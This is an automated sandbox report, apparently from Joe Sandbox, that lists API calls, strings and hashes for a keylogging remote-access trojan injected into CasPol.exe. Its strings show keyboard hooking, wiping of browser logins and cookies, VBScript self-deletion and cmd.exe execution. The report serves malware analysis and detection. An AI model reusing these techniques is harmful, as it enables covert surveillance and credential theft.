                                                                                                  • Part of subcall function 0041AD43: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00466900,0040C07B,.vbs,?,?,?,?,?,00475308), ref: 0041AD6A
                                                                                                  • Part of subcall function 0041789C: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00466324), ref: 004178B2
                                                                                                  • Part of subcall function 0041789C: CloseHandle.KERNEL32($cF,?,?,00403AB9,00466324), ref: 004178BB
                                                                                                  • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                • Sleep.KERNEL32(000000FA,00466324), ref: 00403AFC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                • API String ID: 368326130-3219657780
                                                                                                • Opcode ID: 40d39af4114bf2e959fff040f9b52b37707f4b466c611f9b7854aafa364d2e8f
                                                                                                • Instruction ID: 03df4c4d2d4284c33795d9a7a6d048d6c9d09091ba23d5cef523323604a75e49
                                                                                                • Opcode Fuzzy Hash: 40d39af4114bf2e959fff040f9b52b37707f4b466c611f9b7854aafa364d2e8f
                                                                                                • Instruction Fuzzy Hash: 88319531A0011456CB14FB76DC969EE7779AF80318F00007FF906B31D2EF385A4AC699
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B79A: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B7D9
                                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                • API String ID: 2309964880-3562070623
                                                                                                • Opcode ID: b6cb50a5b2214197b9e0d8de8898c1895cdab61a824be6e409039e5ab53e35d2
                                                                                                • Instruction ID: 93f40cfe3ee9365c747514cb1b77cb91c8b74bdf9be970de4a2d602802d72697
                                                                                                • Opcode Fuzzy Hash: b6cb50a5b2214197b9e0d8de8898c1895cdab61a824be6e409039e5ab53e35d2
                                                                                                • Instruction Fuzzy Hash: D42145315042404AC324FB25D8969BF77E4AFD1718F50453FF486620F2EF39AA49C69A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                • wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                • API String ID: 1497725170-1359877963
                                                                                                • Opcode ID: c2de301bd621c078d2ba078b5f310f0f33aac075e82d62b565127cce713b93fc
                                                                                                • Instruction ID: eacaba0d290b76b22f399a57737f65b18f8a023abca8575ba11697f47f6457b1
                                                                                                • Opcode Fuzzy Hash: c2de301bd621c078d2ba078b5f310f0f33aac075e82d62b565127cce713b93fc
                                                                                                • Instruction Fuzzy Hash: F1115172500118AACB18FB96EC56CFF77B8AE48715B00013FF542621D1EF7C5A86C6E9
                                                                                                APIs
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                • String ID: Online Keylogger Started
                                                                                                • API String ID: 112202259-1258561607
                                                                                                • Opcode ID: b599fbb212b7cfe582c7646d18f0cb46316d9d5741b43abf102005e30dc9cb6c
                                                                                                • Instruction ID: 13545b77b67cc4507d33d8d8c8ff512a749ba16b8a43449315e0da64450a8124
                                                                                                • Opcode Fuzzy Hash: b599fbb212b7cfe582c7646d18f0cb46316d9d5741b43abf102005e30dc9cb6c
                                                                                                • Instruction Fuzzy Hash: E80161A1A003193AE62076768C86DBF7A6DCA813A8F41043EF541662C3EA7D5D5582FA
                                                                                                APIs
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,8@,?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACD9
                                                                                                • GetLastError.KERNEL32(?,0044ABA1,8@,0046ED38,0000000C), ref: 0044ACE3
                                                                                                • __dosmaperr.LIBCMT ref: 0044AD0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                • String ID: 8@
                                                                                                • API String ID: 2583163307-819625340
                                                                                                • Opcode ID: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                                                                • Instruction ID: 727ae4bd5dc399200e14d16721253afac520870d53d00e52bc8525c117eb1139
                                                                                                • Opcode Fuzzy Hash: f11388ad4d481d826d75519938a9a20661ac3afaecb278e3b0e3570ed3326013
                                                                                                • Instruction Fuzzy Hash: 6F018836640A100BF3212634688573F67498B91B39F29022FF804872D2CE2D8CC1919F
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                                • String ID: Connection Timeout
                                                                                                • API String ID: 2055531096-499159329
                                                                                                • Opcode ID: c9db23556e7a5907e98359d8e762215bf5c4cc9c90218e9daab605252b7cd890
                                                                                                • Instruction ID: 3c9b6871d48b6b3111a672927d5bafc1cfd46058a166b60e959a8cf6be3f516d
                                                                                                • Opcode Fuzzy Hash: c9db23556e7a5907e98359d8e762215bf5c4cc9c90218e9daab605252b7cd890
                                                                                                • Instruction Fuzzy Hash: 1601F5B1900B41AFD325BB3A8C4255ABFE4AB45315740053FE293A2BA2DE38E440CB5E
                                                                                                APIs
                                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752F0), ref: 00412857
                                                                                                • RegSetValueExW.ADVAPI32(004752F0,?,00000000,00000001,00000000,00000000,00475308,?,0040E6A3,pth_unenc,004752F0), ref: 00412885
                                                                                                • RegCloseKey.ADVAPI32(004752F0,?,0040E6A3,pth_unenc,004752F0), ref: 00412890
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 1818849710-4028850238
                                                                                                • Opcode ID: 2b72839c34b3cecad4a9efae9834add99ea03f9564e8004151796020c5cf8ad5
                                                                                                • Instruction ID: ab464752906d06cf6e422ab9fb9c42b8cedad3247386a7cb387aa37f92243dc4
                                                                                                • Opcode Fuzzy Hash: 2b72839c34b3cecad4a9efae9834add99ea03f9564e8004151796020c5cf8ad5
                                                                                                • Instruction Fuzzy Hash: 2DF09071500218BBDF50AFA0EE46FEE376CEF40B55F10452AF902B60A1EF75DA08DA94
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CE9C
                                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CEDB
                                                                                                  • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 004349EC
                                                                                                  • Part of subcall function 004349CD: _Yarn.LIBCPMT ref: 00434A10
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CEFF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                • String ID: bad locale name
                                                                                                • API String ID: 3628047217-1405518554
                                                                                                • Opcode ID: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                                                                • Instruction ID: d3fe92e39fe1a76843bdcbebe92e6b3b15f8dcb0f99b50ce5c9cc2ba4b618b17
                                                                                                • Opcode Fuzzy Hash: 010949cb006bc602daa897d098c336462d98aae1940c118575e4f0b09407aa79
                                                                                                • Instruction Fuzzy Hash: FEF03171004214AAC768FB62D853ADE77A4AF14758F504B3FF046224D2AF7CB619C688
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041538C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: /C $cmd.exe$open
                                                                                                • API String ID: 587946157-3896048727
                                                                                                • Opcode ID: b799db65b19b64ea83398d7d6a480beb53c0bbc67eac42254a732b9a5fcca3ea
                                                                                                • Instruction ID: 200bce0b0309f38ec9064e519a9a4578f5a600b3ca3b701a036ea6d1077247ba
                                                                                                • Opcode Fuzzy Hash: b799db65b19b64ea83398d7d6a480beb53c0bbc67eac42254a732b9a5fcca3ea
                                                                                                • Instruction Fuzzy Hash: F1E0C0B11043406AC708FB65DC96DBF77AC9A90749F10483FB582621E2EE78A949865E
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(004099A9,00000000,00475308,pth_unenc,0040BF26,004752F0,00475308,?,pth_unenc), ref: 0040AFC9
                                                                                                • UnhookWindowsHookEx.USER32(00475108), ref: 0040AFD5
                                                                                                • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                                                                • Instruction ID: 19faee7e247875c6ed4f8509c992ad96cda0262a64c11258bcf204109443e34b
                                                                                                • Opcode Fuzzy Hash: 5ce168509fd4f53ac483e5472d8910f69c83d539265d002f33f874c0df2e9344
                                                                                                • Instruction Fuzzy Hash: BEE01DB1245715DFD3101F545C94825BB99EB44746324087FF6C165252CD798C14C759
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: GetCursorInfo$User32.dll
                                                                                                • API String ID: 1646373207-2714051624
                                                                                                • Opcode ID: 0df56b3ea47fb749bec4bd55cc4ccf0acac8e18c0c6121f5027aebd44438a81f
                                                                                                • Instruction ID: d22651b824a9dcc27ed8a3983426188770e59c2792dec55b339c490717ece8d0
                                                                                                • Opcode Fuzzy Hash: 0df56b3ea47fb749bec4bd55cc4ccf0acac8e18c0c6121f5027aebd44438a81f
                                                                                                • Instruction Fuzzy Hash: 54B09B705457459BC600DBE15C4D7143D14A544703B104069F04791151DE7450008F1E
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: GetLastInputInfo$User32.dll
                                                                                                • API String ID: 2574300362-1519888992
                                                                                                • Opcode ID: dda8da8e992a33b18976b493c6326eaa7f3d62003a83836ab2f58572c3d9c97a
                                                                                                • Instruction ID: 0ec815453ed4bd5b2a0753acad69ff197eebc14e76dec883dd33c8fab126b773
                                                                                                • Opcode Fuzzy Hash: dda8da8e992a33b18976b493c6326eaa7f3d62003a83836ab2f58572c3d9c97a
                                                                                                • Instruction Fuzzy Hash: EDB092B19827449FC7006BE0AD8DA263A64B654B43729006BF04BE51A1EEB890009A1F
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 1036877536-0
                                                                                                • Opcode ID: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                                                                • Instruction ID: 0b1f6a9dfc50a2d3a5cef35921af3bd2f2baba9a31ad448e356136b6fbdd55d0
                                                                                                • Opcode Fuzzy Hash: af13233f64bff1d952fd16752439a8415c6481e4108584e155c4282d62de78f9
                                                                                                • Instruction Fuzzy Hash: 3AA14532A042869FFB258E18C8817AFBBA1EF15354F1841AFE8859B382C67C8D41D758
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06f5741e10c63ae8bf02417847894b944428abddfdd2a378d9b946abe0f64cd5
                                                                                                • Instruction ID: 88518833c1d7008d36d723bd78668d328a40e80baed6ee8e3f57c0ed0377fbed
                                                                                                • Opcode Fuzzy Hash: 06f5741e10c63ae8bf02417847894b944428abddfdd2a378d9b946abe0f64cd5
                                                                                                • Instruction Fuzzy Hash: FE413AB1A00704BFE7249F39CC41BAABBA8EB84718F10412FF405DB291D379A9418788
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                                • __freea.LIBCMT ref: 100087D5
                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                • String ID:
                                                                                                • API String ID: 2652629310-0
                                                                                                • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                                • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                                • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                • API String ID: 3472027048-1236744412
                                                                                                • Opcode ID: b4b5c9734f0ad2729dfc45ffa9530181a3bb08da764fba161ef59098aa9632f0
                                                                                                • Instruction ID: 247d09dce9e3c977c7e86e48a76dae703d52755688f8fe644b587970fcea700c
                                                                                                • Opcode Fuzzy Hash: b4b5c9734f0ad2729dfc45ffa9530181a3bb08da764fba161ef59098aa9632f0
                                                                                                • Instruction Fuzzy Hash: FE31A81124C38069CA117B7514167AB6F958A93754F08847FE8C4273E3DB7A480883EF
                                                                                                APIs
                                                                                                • EnumDisplayMonitors.USER32(00000000,00000000,004188F2,00000000), ref: 00418818
                                                                                                • EnumDisplayDevicesW.USER32(?), ref: 00418848
                                                                                                • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004188BD
                                                                                                • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004188DA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DisplayEnum$Devices$Monitors
                                                                                                • String ID:
                                                                                                • API String ID: 1432082543-0
                                                                                                • Opcode ID: f521dafb0295dc45c8c38bceff4b7bff5c3c9c28471fb5873da2cd52b0f48c87
                                                                                                • Instruction ID: 8a998fcd3466a1ac5c09a6ba9f6cc31f14a3926adb32c7c165c8f26c3d999b60
                                                                                                • Opcode Fuzzy Hash: f521dafb0295dc45c8c38bceff4b7bff5c3c9c28471fb5873da2cd52b0f48c87
                                                                                                • Instruction Fuzzy Hash: 952180721043046BD320EB16DC85EABBBECEFD1754F00053EB449D2191EB78AA49C6A6
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                                • String ID:
                                                                                                • API String ID: 188215759-0
                                                                                                • Opcode ID: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                                                                • Instruction ID: 7cb4eddd506215a21d9c44be4850b318e12e80d273729b61be08d6c7a3dfdc1e
                                                                                                • Opcode Fuzzy Hash: a7e496ea74412c4f74dd561fc1d9e5efe2a930fde01781876ab294e7da94f75c
                                                                                                • Instruction Fuzzy Hash: 9A216D725043009FC304EF65D9858AFB7E8EFC8714F044A2EF58593251EA38EA49CBA7
                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8F1: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B901
                                                                                                  • Part of subcall function 0041B8F1: GetWindowTextLengthW.USER32(00000000), ref: 0041B90A
                                                                                                  • Part of subcall function 0041B8F1: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B934
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]
                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                                                                • Instruction ID: 7bed66d096a43dd94c2219bc8d3cdd3a5a7df98386a17a5ae9bf36b343ab91a8
                                                                                                • Opcode Fuzzy Hash: a49d20d3ecb8acddbd4132256805943c56c930b2d695a3c4727dac55219dcbc1
                                                                                                • Instruction Fuzzy Hash: AF119F315042009BD218BB26DC17AAEBBA8AF41708F40047FF542621D3EF79AA1986DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
                                                                                                • Instruction ID: b58c8eca075ef28bddc965f0bc4d2171c3ec1f8ef65ef5096018edf4bb449d44
                                                                                                • Opcode Fuzzy Hash: 0179cd47eff8c75336d676f059f6bc7958f0419c29ca715f1c911511461a8d64
